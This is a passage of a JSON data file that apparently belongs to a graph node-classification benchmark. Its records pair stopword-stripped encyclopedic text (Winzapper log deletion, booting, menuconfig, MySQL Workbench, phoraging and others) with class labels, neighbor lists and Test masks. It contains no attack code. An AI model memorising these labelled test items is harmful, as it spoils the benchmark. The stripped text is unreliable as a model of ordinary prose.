    "text": "Winzapper:winzapper winzapper freeware utility hacking tool used delete events microsoft windows nt 4.0 windows 2000 security log developed arne vidstrom proof-of-concept tool demonstrating administrator account compromised event logs longer reliable according hacking exposed windows server 2003 winzapper works windows nt/2000/2003 prior winzapper creation administrators already ability clear security log either event viewer third-party tools clearlogs however windows lacked built-in method selectively deleting events security log unexpected clearing log would likely red flag system administrators intrusion occurred winzapper would allow hacker hide intrusion deleting log events relevant attack winzapper publicly released lacked ability run remotely without use tool terminal services however according arne vidstrom could easily modified remote operation also unrelated trojan horse name winzapper creates backup security log dummy.dat systemroot \\system32\\config file may undeleted attack recover original log conceivably however savvy user might copy sufficiently large file dummy.dat file thus irretrievably overwrite winzapper causes event viewer become unusable reboot unexpected reboot may clue winzapper recently used another potential clue winzapper-based attempt would corruption security log requiring cleared since always small risk winzapper according windowsnetworking.com one way prevent rogue admins using tool servers implement software restriction policy using group policy prevents winzapper executable running",
    "neighbors": [
      10756,
      2801,
      3250,
      3290,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 2808,
    "label": 9,
    "text": "Dynamic_compilation:dynamic compilation dynamic compilation process used programming language implementations gain performance program execution although technique originated self best-known language uses technique java since machine code emitted dynamic compiler constructed optimized program runtime use dynamic compilation enables optimizations efficiency available compiled programs except code duplication metaprogramming runtime environments using dynamic compilation typically programs run slowly first minutes compilation recompilation done runs quickly due initial performance lag dynamic compilation undesirable certain cases implementations dynamic compilation optimizations could done initial compile time delayed compilation run-time causing unnecessary slowdowns just-in-time compilation form dynamic compilation closely related technique incremental compilation incremental compiler used pop-2 pop-11 forth versions lisp e.g maclisp least one version ml programming language poplog ml requires compiler programming language part runtime system consequence source code read time terminal file possibly data-structure constructed running program translated machine code block function may replace previous function name immediately available use program need speed compilation interactive development testing compiled code likely heavily optimised code produced standard 'batch compiler reads source code produces object files subsequently linked run however incrementally compiled program typically run much faster interpreted version program incremental compilation thus provides mixture benefits interpreted compiled languages aid portability generally desirable incremental compiler operate two stages namely first compiling intermediate platform-independent language compiling machine code host machine case porting requires changing 'back end compiler unlike dynamic compilation defined incremental compilation involve optimisations program first run",
    "neighbors": [
      1409,
      7173,
      4112,
      10013,
      1952,
      8609,
      7462,
      11688,
      1963,
      5677,
      2620,
      3904,
      8262,
      6477,
      10703,
      3413,
      8280,
      3553,
      8037,
      6502,
      10470,
      5872,
      5361,
      9714,
      499,
      7421,
      6142
    ],
    "mask": "Test"
  },
  {
    "node_id": 2809,
    "label": 3,
    "text": "Menuconfig:menuconfig codice_1 one five similar tools configure linux source necessary early step needed compile source code codice_1 menu-driven user interface allows user choose features linux options compiled normally invoked using command codice_1 menuconfig target linux makefile codice_1 first version linux predecessor tool question-and-answer-based utility codice_5 codice_6 third tool linux configuration codice_7 requires qt also codice_8 uses gtk+ codice_9 similar codice_1 tools use kconfig language internally kconfig also used projects das u-boot bootloader embedded devices buildroot tool generating embedded linux systems busybox single-executable shell utility toolbox embedded systems despite simple design codice_1 offers considerable advantages question-and-answer-based configuration tool codice_6 notable basic search system ability load save files filenames different “ codice_13 ” codice_1 gives user ability navigate forwards backwards directly features rather using codice_5 pressing key many many times navigate linearly configuration specific feature user satisfied previous codice_13 file using codice_6 uses previous file answer questions interactively presenting new features intended version upgrade may appropriate times codice_1 light load system resources unlike codice_7 uses qt version 2.6.31.1 formerly tk codice_8 utilizes gtk+ possible ignore features codice_5 makes likely one configure incomplete oversized kernel recommended start codice_13 file included linux distribution makes easier configure custom kernel better editing codice_13 hand codice_1 shows descriptions feature adds primitive version 2.6.31.1 dependency checking make oldconfig dependency checking done one step requires user locate features changed hand sure needed ones still enabled practically using codice_1 codice_6 diff also cvs decent text editor provides flexibility dependability configuring linux significant labor users strongly advised make backups i.e codice_27 help information distributed throughout kernel source tree various files called kconfig use codice_1 linux source requirement make tool c compiler ncurses library left features setting empty enclosed two punctuation marks note supplied dependency information primitive tell names depentant features user encouraged read linux readme since also many make targets beyond modules_install install configure kernel different features activated using different interactive interface",
    "neighbors": [
      516,
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      7241,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      1668,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      4398,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      2916,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      1952,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2810,
    "label": 1,
    "text": "MySQL_Workbench:mysql workbench mysql workbench visual database design tool integrates sql development administration database design creation maintenance single integrated development environment mysql database system successor dbdesigner 4 fabforce.net replaces previous package software mysql gui tools bundle dbdesigner4 open source visual database design querying tool mysql database released gpl written 2002/2003 austrian programmer michael g. zinner fabforce.net platform using delphi 7 kylix 3 physical-modeling tool dbdesigner4 offers comprehensive feature set including reverse engineering mysql databases model-to-database synchronization model poster printing basic version control schema models sql query builder available ms windows mac os x linux late 2003 zinner approached representatives mysql ab joined company take development graphical user interface gui tools mysql led creation mysql gui tools bundle mysql gui tools bundle cross-platform open source suite desktop applications administration mysql database servers building manipulating data within mysql databases developed mysql ab later sun microsystems released gpl development gui tools bundle stopped preserved download archives mysql site gui tools bundle superseded mysql workbench reached end-of-life beta releases mysql workbench 5.2 however mysql support team continued provide assistance bundle june 30 2010 first preview version mysql workbench released september 2005 included mysql gui tools bundle development started 2007 mysql workbench set become mysql gui flagship product version numbering started 5.0 emphasise mysql workbench developed successor dbdesigner4 mysql workbench 5.0 5.1 specialized visual database design tools mysql database mysql workbench 5.0 ms windows-only product cross-platform support added mysql workbench 5.1 later starting mysql workbench 5.2 application evolved general database gui application apart physical database modeling features sql editor database migration tools database server administration interface replacing old mysql gui tools bundle may 22 2013 mysql workbench team announced working version 6.0 first public beta labeled version 6.0.2 released june 14 2013 first general-availability release made august 12 2013 january 23 2014 mysql workbench team announced first public beta release version 6.1 first general-availability release made march 31 2014 new features include improved visual explain output performance dashboard performance schema support additional query result views msaa support august 19 2014 mysql workbench team announced first public beta release version 6.2 first general-availability release made september 23 2014 new features shortcut buttons common operations pinning results tab microsoft access migration mysql fabric integration spatial view panel visualize spatial geometry data geometry data viewer result set width sql editor tabs properly saved shared snippets new run sql script dialog model script attachments client connections management new show details window information connections locks attributes displayed performance columns display sizes kb mb gb migration wizard resume operations data copying interrupted mysql connection password remembered across mysql workbench session march 5 2015 mysql workbench team announced first public beta release version 6.3 first general-availability release made april 23 2015 new features include fast migration option migrate data command-line instead gui ssl certificate generator improved sql auto-completion new table data import export wizard mysql enterprise firewall support version 6.3.8 mysql workbench macos incompatibilities macos sierra version 6.3.9 compatible macos sierra however n't work macos high sierra macos high sierra users need run version 6.3.10 april 5 2018 mysql workbench team announced first public release version 8.0.11 release candidate rc together mysql community server 8.0.11 first general availability ga release appeared july 27 2018 together server following new policy aligning version numbers across mysql products mysql workbench uses antlr4 backend parser new auto-completion engine works object editors triggers views stored procedures functions visual sql editor models new versions add support new language features mysql 8.0 common-table expressions roles also support invisible indexes persisting global system variables new default authentication plugin codice_1 mysql 8.0 supported workbench resetting user accounts authentication types longer necessary connecting latest servers administrative tabs updated latest configuration options user interface made consistent tabs prominent features mysql workbench mysql workbench first mysql family products offer two different editions open source proprietary edition community edition full featured product crippled way foundation editions benefit future development efforts proprietary standard edition extends community edition series modules plugins business decision announced soon takeover mysql sun microsystems caused speculation press future licensing mysql database since introduction mysql workbench become popular within mysql community second downloaded product mysql website 250,000 downloads month voted database tool year 2009 developer.com mysql workbench reviewed open source community print magazines",
    "neighbors": [
      2688,
      11392,
      8195,
      10258,
      10389,
      7453,
      1950,
      9503,
      4777,
      7339,
      10413,
      7983,
      9010,
      823,
      6721,
      9665,
      5964,
      5198,
      7506,
      9687,
      9177,
      4186,
      10459,
      6245,
      10470,
      8295,
      8808,
      8554,
      8683,
      2413,
      1646,
      6383,
      7022,
      3188,
      8181,
      10873
    ],
    "mask": "None"
  },
  {
    "node_id": 2811,
    "label": 2,
    "text": "Booting:booting computing booting process starting computer initiated hardware button press software command switched computer central processing unit cpu software main memory process must load software memory executed may done hardware firmware cpu separate processor computer system restarting computer also called rebooting hard e.g electrical power cpu switched soft power cut systems soft boot may optionally clear ram zero hard soft booting initiated hardware button press software command booting complete operative runtime system typically operating system applications attained process returning computer state hibernation sleep involve booting minimally embedded systems require noticeable boot sequence begin functioning turned may simply run operational programs stored rom computing systems state machines reboot may method return designated zero-state unintended locked state addition loading operating system stand-alone utility boot process also load storage dump program diagnosing problems operating system boot short bootstrap bootstrap load derives phrase pull oneself one bootstraps usage calls attention requirement software loaded onto computer software already running computer mechanism must exist load initial software onto computer early computers used variety ad-hoc methods get small program memory solve problem invention read-only memory rom various types solved paradox allowing computers shipped start program could erased growth capacity rom allowed ever elaborate start procedures implemented many different methods available load short initial program computer methods reach simple physical input removable media hold complex programs early computers 1940s 1950s one-of-a-kind engineering efforts could take weeks program program loading one many problems solved early computer eniac program stored memory set problem configuration interconnecting cables bootstrapping apply eniac whose hardware configuration ready solving problems soon power applied edsac system second stored-program computer built used stepping switches transfer fixed program memory start button pressed program stored device david wheeler completed late 1948 loaded instructions punched tape executed first programmable computers commercial sale univac ibm 701 included features make operation simpler typically included instructions performed complete input output operation hardware logic could used load contents punch card typical ones input media magnetic drum magnetic tape contained bootstrap program pressing single button booting concept called variety names ibm computers 1950s early 1960s ibm used term initial program load ibm 7030 stretch later used mainframe lines starting system/360 1964 ibm 701 computer 1952–1956 load button initiated reading first 36-bit word main memory punched card card reader magnetic tape tape drive magnetic drum unit depending position load selector switch left 18-bit half-word executed instruction usually read additional words memory loaded boot program executed turn loaded larger program medium memory without help human operator term boot used sense since least 1958 ibm computers era similar features example ibm 1401 system c. 1958 used card reader load program punched card 80 characters stored punched card read memory locations 001 080 computer would branch memory location 001 read first stored instruction instruction always move information first 80 memory locations assembly area information punched cards 2 3 4 could combined form stored program information moved assembly area machine would branch instruction location 080 read card next card would read information processed another example ibm 650 1953 decimal machine group ten 10-position switches operator panel addressable memory word address 8000 could executed instruction thus setting switches 7004000400 pressing appropriate button would read first card card reader memory op code 70 starting address 400 jump 400 begin executing program card ibm competitors also offered single button program load noteworthy variation found burroughs b1700 neither bootstrap rom hardwired ipl operation instead system reset reads executes opcodes sequentially tape drive mounted front panel sets boot loader ram executed however since makes assumptions system equally well used load diagnostic maintenance test routine tapes display intelligible code front panel even cases gross cpu failure ibm system/360 successors including current z/architecture machines boot process known initial program load ipl ibm coined term 7030 stretch revived design system/360 continues use environments today system/360 processors ipl initiated computer operator selecting three hexadecimal digit device address cuu c=i/o channel address uu=control unit device address followed pressing load button high end system/360 models system/370 later systems functions switches load button simulated using selectable areas screen graphics console often ibm 2250-like device ibm 3270-like device example system/370 model 158 keyboard sequence 0-7-x zero seven x order results ipl device address keyed input area amdahl 470v/6 related cpus supported four hexadecimal digits cpus optional second channel unit installed total 32 channels later ibm would also support 16 channels ipl function system/360 successors compatibles amdahl reads 24 bytes operator-specified device main storage starting real address zero second third groups eight bytes treated channel command words ccws continue loading startup program first ccw always simulated cpu consists read ipl command command chaining suppress incorrect length indication enforced i/o channel commands complete first group eight bytes loaded processor program status word psw startup program begins execution location designated psw ipl device usually disk drive hence special significance read-type command exactly procedure also used ipl input-type devices tape drives even card readers device-independent manner allowing example installation operating system brand-new computer os initial distribution magnetic tape disk controllers command also causes selected device seek cylinder head simulating seek cylinder head command search record simulating search id equal command seeks searches simulated tape card controllers device classes command simply sequential read command read ipl command disk tape card deck must contain special program load actual operating system standalone utility main storage specific purpose ipl text placed disk stand-alone dasdi direct access storage device initialization program equivalent program running operating system e.g. ickdsf ipl-able tapes card decks usually distributed ipl text already present minicomputers starting digital equipment corporation dec pdp-5 pdp-8 1965 simplified design using cpu assist input output operations saved cost made booting complicated pressing single button minicomputers typically way toggle short programs manipulating array switches front panel since early minicomputers used magnetic core memory lose information power bootstrap loaders would remain place unless erased erasure sometimes happened accidentally program bug caused loop overwrote memory minicomputers simple form booting include hewlett-packard hp 2100 series mid-1960s original data general nova 1969 dec pdp-11 1970 dec later added optional diode matrix read-only memory pdp-11 stored bootstrap program 32 words 64 bytes consisted printed circuit card m792 plugged unibus held 32 16 array semiconductor diodes 512 diodes place memory contained one bits card programmed cutting diode whose bit zero dec also sold versions card bm792-yx series pre-programmed many standard input devices simply omitting unneeded diodes following older approach earlier pdp-1 hardware loader operator need push load switch instruct paper tape reader load program directly core memory data general supernova used front panel switches cause computer automatically load instructions memory device specified front panel data switches jump loaded code nova 800 1200 switch loaded program main memory special read-only memory jumped minicomputer paper tape reader first program run boot process boot loader would read core memory either second-stage boot loader often called binary loader could read paper tape checksum operating system outside storage medium pseudocode boot loader might simple following eight instructions related example based loader nicolet instrument corporation minicomputer 1970s using paper tape reader-punch unit teletype model 33 asr teleprinter bytes second-stage loader read paper tape reverse order length second stage loader final byte overwrites location 7 instruction location 6 executes location 7 starts second stage loader executing second stage loader waits much longer tape containing operating system placed tape reader difference boot loader second stage loader addition checking code trap paper tape read errors frequent occurrence relatively low-cost part-time-duty hardware teletype model 33 asr friden flexowriters far reliable also comparatively costly earliest microcomputers altair 8800 released first 1975 even earlier similar machine based intel 8008 cpu bootstrapping hardware started cpu would see memory would contain executable code containing binary zeros—memory cleared resetting powering front panels machines carried toggle switches entering addresses data one switch per bit computer memory word address bus simple additions hardware permitted one memory location time loaded switches store bootstrap code meanwhile cpu kept attempting execute memory content correctly loaded cpu enabled execute bootstrapping code process tedious error-free boot process minicomputers microcomputers revolutionized introduction integrated circuit read-only memory rom many variants including mask-programmed roms programmable roms prom erasable programmable roms eprom flash memory allowed firmware boot programs included part computer introduction external rom italian telephone switching elaborator called gruppi speciali patented 1975 alberto ciaramella researcher cselt gruppi speciali starting 1975 fully single-button machine booting operating system rom memory composed semiconductors ferrite cores although rom device natively embedded computer gruppi speciali due design machine also allowed single-button rom booting machines designed therefore bootstrap device architecture-independent e.g pdp-11 storing state machine switch-off also place another critical feature telephone switching contest typically every microprocessor reset power-on condition perform start-up process usually takes form begin execution code found starting specific address look multibyte code specific address jump indicated location begin execution system built using microprocessor permanent rom occupying special locations system always begins operating without operator assistance example intel x86 processors always start running instructions beginning f000 fff0 mos 6502 processor initialization begins reading two-byte vector address fffd ms byte fffc ls byte jumping location run bootstrap code apple inc. first computer apple 1 introduced 1976 featured prom chips eliminated need front panel boot process case altair 8800 commercial computer according apple ad announcing switches lights ... firmware proms enables enter display debug programs hex keyboard due expense read-only memory time apple ii series booted disk operating systems using series small incremental steps passing control onward next phase gradually complex boot process see apple dos boot loader little disk operating system relied rom hardware also extremely flexible supported wide range customized disk copy protection mechanisms see software cracking history operating systems notably pre-1995 macintosh systems apple closely interwoven hardware impossible natively boot operating system standard one opposite extreme scenario using switches mentioned highly inflexible relatively error-proof foolproof long hardware working normally common solution situations design boot loader works program belonging standard os hijacks system loads alternative os technique used apple a/ux unix implementation copied various freeware operating systems beos personal edition 5 machines like atari st microcomputer instant-on operating system executing rom retrieval os secondary tertiary store thus eliminated one characteristic operations bootstrapping allow system customizations accessories support software loaded automatically atari floppy drive read additional components boot process timeout delay provided time manually insert floppy system searched extra components could avoided inserting blank disk atari st hardware also designed cartridge slot could provide native program execution gaming purposes holdover atari legacy making electronic games inserting spectre gcr cartridge macintosh system rom game slot turning atari could natively boot macintosh operating system rather atari tos ibm personal computer included rom-based firmware called bios one functions firmware perform power-on self test machine powered read software boot device execute firmware compatible bios ibm personal computer used ibm pc compatible computers extensible firmware interface developed intel originally itanium-based machines later also used alternative bios x86-based machines including apple macs using intel processors unix workstations originally vendor-specific rom-based firmware sun microsystems later developed openboot later known open firmware incorporated forth interpreter much firmware written forth standardized ieee ieee standard 1275-1994 firmware implements standard used powerpc-based macs powerpc-based machines well sun sparc-based computers advanced risc computing specification defined another firmware standard implemented mips-based alpha-based machines sgi visual workstation x86-based workstations computer turned softwareincluding operating systems application code dataremains stored non-volatile memory computer powered typically operating system loader random-access memory ram computer first executes relatively small program stored read-only memory rom along small amount needed data access nonvolatile device devices operating system programs data loaded ram small program starts sequence known bootstrap loader bootstrap boot loader small program job load data programs executed ram often multiple-stage boot loaders used several programs increasing complexity load one process chain loading computer systems upon receiving boot signal human operator peripheral device may load small number fixed instructions memory specific location initialize least one cpu point cpu instructions start execution instructions typically start input operation peripheral device may switch-selectable operator systems may send hardware commands directly peripheral devices i/o controllers cause extremely simple input operation read sector zero system device memory starting location 1000 carried effectively loading small number boot loader instructions memory completion signal i/o device may used start execution instructions cpu smaller computers often use less flexible automatic boot loader mechanisms ensure computer starts quickly predetermined software configuration many desktop computers example bootstrapping process begins cpu executing software contained rom example bios ibm pc predefined address cpus including intel x86 series designed execute software reset without outside help software contains rudimentary functionality search devices eligible participate booting load small program special section commonly boot sector promising device typically starting fixed entry point start sector boot loaders may face peculiar constraints especially size instance ibm pc compatibles boot sector typically work 32 kb later relaxed 64 kb system memory use instructions supported original 8088/8086 processors first stage pc boot loaders fsbl first-stage boot loader located fixed disks removable drives must fit first 446 bytes master boot record order leave room default 64-byte partition table four partition entries two-byte boot signature bios requires proper boot loader — even less additional features like four partition entries 16 16 bytes disk signature 6 bytes disk timestamp 6 bytes advanced active partition 18 bytes special multi-boot loaders supported well environments floppy superfloppy volume boot records 59 bytes occupied extended bios parameter block fat12 fat16 volumes since dos 4.0 whereas fat32 ebpb introduced dos 7.1 requires even 87 bytes leaving 423 bytes boot loader assuming sector size 512 bytes microsoft boot sectors therefore traditionally imposed certain restrictions boot process example boot file located fixed position root directory file system stored consecutive sectors conditions taken care codice_1 command slightly relaxed later versions dos boot loader able load first three sectors file memory happened contain another embedded boot loader able load remainder file memory microsoft added lba fat32 support even switched boot loader reaching two physical sectors using 386 instructions size reasons time vendors managed squeeze much functionality single boot sector without relaxing original constraints minimal available memory 32 kb processor support 8088/8086 example dr-dos boot sectors able locate boot file fat12 fat16 fat32 file system load memory whole via chs lba even file stored fixed location consecutive sectors examples first-stage bootloaders include coreboot libreboot das u-boot second-stage boot loaders gnu grub bootmgr syslinux ntldr bootx operating systems able load operating system properly transfer execution operating system subsequently initializes may load extra device drivers second-stage boot loader need drivers operation may instead use generic storage access methods provided system firmware bios open firmware though typically restricted hardware functionality lower performance many boot loaders like gnu grub windows bootmgr windows nt/2000/xp ntldr configured give user multiple booting choices choices include different operating systems dual multi-booting different partitions drives different versions operating system case new version unexpected problems different operating system loading options e.g. booting rescue safe mode standalone programs function without operating system memory testers e.g. memtest86+ basic shell gnu grub even games see list pc booter games boot loaders also load boot loaders example grub loads bootmgr instead loading windows directly usually default choice preselected time delay user press key change choice delay default choice automatically run normal booting occur without interaction boot process considered complete computer ready interact user operating system capable running system programs application programs many embedded systems must boot immediately example waiting minute digital television gps navigation device start generally unacceptable therefore devices software systems rom flash memory device begin functioning immediately little loading necessary loading precomputed stored rom device made large complex systems may boot procedures proceed multiple phases finally operating system programs loaded ready execute operating systems designed never start stop boot loader might load operating system configure mere process within system irrevocably transfer control operating system boot loader terminates normally process would computers also capable booting computer network scenario operating system stored disk server certain parts transferred client using simple protocol trivial file transfer protocol tftp parts transferred operating system takes control booting process second-stage boot loader network booting begins using generic network access methods provided network interface boot rom typically contains preboot execution environment pxe image drivers required system functionality limited operating system kernel drivers transferred started result rom-based booting completed entirely possible network boot operating system ability use network interface boot device device operating system loaded modern pc uefi bios firmware supports booting various devices typically local solid state drive hard disk drive via gpt master boot record mbr drive disk optical disc drive using el torito usb mass storage device ftl-based flash drive sd card multi-media card slot hard disk drive optical disc drive etc network interface card using pxe older less common bios-bootable devices include floppy disk drives scsi devices zip drives ls-120 drives typically firmware uefi bios allow user configure boot order boot order set first dvd drive second hard disk drive firmware try boot dvd drive fails e.g dvd drive try boot local hard disk drive example pc windows xp installed hard drive user could set boot order one given insert linux live cd order try linux without install operating system onto hard drive example dual booting user chooses operating system start computer performed power-on self-test post example dual booting user chooses inserting removing cd computer common choose operating system boot selecting bios uefi boot menu using computer keyboard boot menu typically entered pressing keys post several devices available enable user quick-boot usually variant linux various simple tasks internet access examples splashtop latitude upon starting ibm-compatible personal computer x86 cpu executes real mode instruction located reset vector physical memory address 16-bit x86 processors 32-bit 64-bit x86 processors usually pointing firmware uefi bios entry point inside rom memory location typically contains jump instruction transfers execution location firmware uefi bios start-up program program runs power-on self-test post check initialize required devices dram pci bus including running embedded roms complicated step setting dram spi made difficult fact point memory limited initializing required hardware firmware uefi bios goes pre-configured list non-volatile storage devices boot device sequence finds one bootable bootable mbr device defined one read last two bytes first sector contain little-endian word found byte sequence disk also known mbr boot signature otherwise established code inside sector executable x86 pcs bios found bootable device loads boot sector linear address usually segment offset bioses erroneously use transfers execution boot code case hard disk referred master boot record mbr definition operating-system specific conventional mbr code checks mbr partition table partition set bootable one active flag set active partition found mbr code loads boot sector code partition known volume boot record vbr executes vbr often operating-system specific however operating systems main function load execute operating system kernel continues startup active partition active partition boot sector invalid mbr may load secondary boot loader select partition often via user input load boot sector usually loads corresponding operating system kernel cases mbr may also attempt load secondary boot loaders trying boot active partition else fails issue int 18h bios interrupt call followed int 19h case int 18h would return order give back control bios would attempt boot devices attempt remote boot via network invoke rom basic systems particularly newer macintoshes new editions microsoft windows use intel efi also coreboot allows computer boot without firmware/bios constantly running system management mode 16-bit bios interfaces required certain x86 operating systems dos windows 3.1/95/98 booted via uefi however boot loaders retain 16-bit bios call support modern cpus microcontrollers example ti omap sometimes even dsps may boot rom boot code integrated directly silicon processor could perform quite sophisticated boot sequence load boot programs various sources like nand flash sd mmc card difficult hardwire required logic handling devices integrated boot rom used instead scenarios boot rom usage enables flexible boot sequences hardwired logic could provide example boot rom could try perform boot multiple boot sources also boot rom often able load boot loader diagnostic program via serial interfaces like uart spi usb feature often used system recovery purposes reasons usual boot software non-volatile memory got erased could also used initial non-volatile memory programming clean non-volatile memory installed hence software available system yet embedded system designs may also include intermediary boot sequence step form additional code gets loaded system ram integrated boot rom additional code loaded way usually serves way overcoming platform limitations small amounts ram dedicated primary boot loader das u-boot loaded next step system boot sequence additional code boot sequence step usually referred secondary program loader spl also possible take control system using hardware debug interface jtag interface may used write boot loader program bootable non-volatile memory e.g flash instructing processor core perform necessary actions program non-volatile memory alternatively debug interface may used upload diagnostic boot code ram start processor core instruct execute uploaded code allows example recovery embedded systems software remains supported boot device processor integrated boot rom jtag standard popular interface many cpus microcontrollers devices manufactured jtag interfaces 2009 microcontrollers provide special hardware interfaces used take arbitrary control system directly run code instead allow insertion boot code bootable non-volatile memory like flash memory via simple protocols manufacturing phase interfaces used inject boot code possibly code non-volatile memory system reset microcontroller begins execute code programmed non-volatile memory like usual processors using roms booting notably technique used atmel avr microcontrollers others well many cases interfaces implemented hardwired logic cases interfaces could created software running integrated on-chip boot rom gpio pins digital signal processors serial mode boot parallel mode boot host port interface hpi boot case dsps often second microprocessor microcontroller present system design responsible overall system behavior interrupt handling dealing external events user interface etc dsp dedicated signal processing tasks systems dsp could booted another processor sometimes referred host processor giving name host port processor also sometimes referred master since usually boots first memories controls overall system behavior including booting dsp controlling dsp behavior dsp often lacks boot memories relies host processor supply required code instead notable systems design cell phones modems audio video players dsp cpu/microcontroller co-existing many fpga chips load configuration external serial eeprom configuration rom power-up",
    "neighbors": [
      2560,
      516,
      6148,
      8710,
      2055,
      1032,
      6155,
      7187,
      10776,
      25,
      1561,
      8732,
      4637,
      9762,
      4643,
      6180,
      3109,
      9767,
      1071,
      7217,
      10803,
      10809,
      7739,
      9791,
      576,
      2625,
      7234,
      3142,
      8774,
      2635,
      7244,
      6221,
      10839,
      3160,
      2137,
      8793,
      93,
      10333,
      97,
      11363,
      7269,
      1126,
      6248,
      6760,
      10856,
      107,
      9835,
      8301,
      7281,
      7794,
      6771,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      4735,
      5247,
      11390,
      2179,
      8835,
      10883,
      6281,
      651,
      10891,
      6797,
      10382,
      7311,
      10896,
      9874,
      8852,
      7317,
      663,
      6296,
      2201,
      9370,
      9882,
      11415,
      9887,
      9377,
      675,
      6820,
      2213,
      1193,
      682,
      3241,
      8877,
      10926,
      8879,
      178,
      3250,
      9907,
      6837,
      9910,
      7863,
      2744,
      6329,
      8889,
      8687,
      6333,
      5823,
      5312,
      6340,
      8388,
      5318,
      1736,
      2248,
      1741,
      7375,
      5840,
      7377,
      6868,
      7382,
      8410,
      9947,
      9436,
      1247,
      3297,
      11489,
      7403,
      6380,
      10989,
      1263,
      1776,
      242,
      2290,
      3314,
      5363,
      9972,
      2807,
      9466,
      3323,
      1276,
      2813,
      1278,
      9468,
      11012,
      8966,
      1804,
      9996,
      10508,
      273,
      8977,
      787,
      789,
      1814,
      5397,
      3866,
      8474,
      6942,
      10016,
      292,
      5927,
      5928,
      2345,
      10235,
      3886,
      7983,
      7984,
      1841,
      5425,
      2355,
      9518,
      7477,
      10036,
      823,
      9016,
      1849,
      4409,
      6459,
      7483,
      8509,
      318,
      3390,
      3904,
      4926,
      4929,
      7999,
      9540,
      11075,
      4423,
      10571,
      5452,
      6988,
      7501,
      2383,
      5457,
      7507,
      9044,
      3413,
      7511,
      7515,
      9563,
      4957,
      7519,
      8032,
      1377,
      3426,
      5985,
      11108,
      8551,
      9066,
      10091,
      5484,
      7020,
      7534,
      1903,
      3953,
      11634,
      11635,
      372,
      2933,
      5492,
      1399,
      376,
      5500,
      8573,
      1406,
      7039,
      8063,
      9599,
      1922,
      10113,
      8069,
      1414,
      5000,
      8073,
      394,
      3978,
      4492,
      1933,
      5003,
      8078,
      5520,
      7057,
      10130,
      5523,
      2452,
      6037,
      6550,
      11675,
      2462,
      5022,
      1440,
      421,
      1445,
      935,
      3496,
      4521,
      10153,
      9643,
      4525,
      5040,
      7601,
      8114,
      11184,
      2996,
      10676,
      7607,
      4024,
      954,
      6078,
      8127,
      9151,
      9665,
      11204,
      11205,
      4040,
      4041,
      8136,
      9166,
      4563,
      2005,
      5080,
      5596,
      477,
      1501,
      2530,
      2533,
      4581,
      10730,
      1515,
      10731,
      9709,
      6639,
      6128,
      2545,
      5105,
      499,
      5619,
      6129,
      3062,
      5110,
      7151,
      5115,
      8700,
      2557,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 2812,
    "label": 4,
    "text": "Phoraging:phoraging field computer security phoraging pronounced foraging defined process collecting data many different online sources build identity someone ultimate aim committing identity theft along phishing pharming third p cybercrime phoraging concept similar many ways phishing pharming information diving similar mosaic theory finance phoraging searching information usually aim identity theft whereby criminal collects data variety different online sources build identity consumer commit identity theft crooks phorage information variety different sources including social networking sites public records phishing attacks confidential information submitted unsecured way websites well computer viruses spyware put data together guess passwords answers security questions ultimate aim stealing money pc pro referred concept january 2009 issue security vendor verisign also use refer term uk office fair trading defines phoraging tactic used fraudsters aggregate personal information multiple sources intent misusing individual identity tactic known 'phoraging",
    "neighbors": [
      10915,
      4945,
      7606,
      10392,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2813,
    "label": 2,
    "text": "OS/VS2_(SVS):os/vs2 svs single virtual storage svs refers release 1 operating system/virtual storage 2 os/vs2 successor system mvt option operating system/360 os/vs2 svs stopgap measure pending availability mvs although ibm provided support enhancements svs long shipping mvs svs provides single 16mib address space shared tasks system regardless size physical memory os/360 used interval timer feature providing time day triggering time-dependent events support s/370 made limited use new timing facilities retained dependency interval timer svs uses tod clock clock comparator cpu timer exclusively wake applied data research lawsuit ibm decided although clear whether lawsuit actually deciding factor result svs include sort/merge program language processor new assembler xf replacing assembler f required system generation process authorized program facility apf new facility limited use certain dangerous services programs authorized link edited ac 1 loaded link list lpa sys1.svclib mvs ibm enhanced facility allow installation designate additional data sets authorized reader/interpreter svs runs pageable storage much less benefit automatic sysin batching asb reader svs include os/360 facility called direct sysout dso whereby specific output classes could diverted data sets tape instead normal spool datasets dasd prices dropped facility dropped use svs provide os/360 provided limited interactive facilities conversational remote job entry crje graphic job processing gjp interactive terminal facility itf satellite graphic job processing sgjp prior time sharing option tso ibm carry forward svs tso continues provide equivalent facilities except support use 2250 terminal use 2250 batch job using graphics access method gam graphics subroutine package gsp remains supported os/360 included batch debugging facility named testran clumsier equivalent facility ibsys/ibjob used much advent tso testran became even less relevant svs include dynamic support system dss new os/vs debugging facility system software remained available selectable unit 64 mvs/system extensions release 2 storage key facility system/360 system/370 keeps track page frame modified machine check handler mch svs correct parity ecc error unmodified page unassigning damaged page frame marking page table entry cause pagein operation newly assigned page table replaces special handling refreshable transient svc routines os/360 svs expands size error recovery procedure erp transient area none processors svs runs equivalent 2361 large core storage lcs thus need hierarchy support svs provide svs also dropped support obsolete i/o equipment os/360 load modules could permanently loaded initial program load ipl time area real storage known link pack area lpa svs lpa split three areas searched turn os/360 support multiprocessor version 360/65 svs provide equivalent support customers wanting run multiprocessor system/370 use mvs os/360 introduced telecommunications access method tcam successor queued telecommunications access method qtam svs include qtam svs include remote job entry rje however asp hasp provide comparable facilities larger 16 mib address space svs provides less external fragmentation mvt rollin/rollout would provide less benefit svs include os/360 transient svc routines loaded 1 kib areas known svc transient areas considerable amount code required manage svs 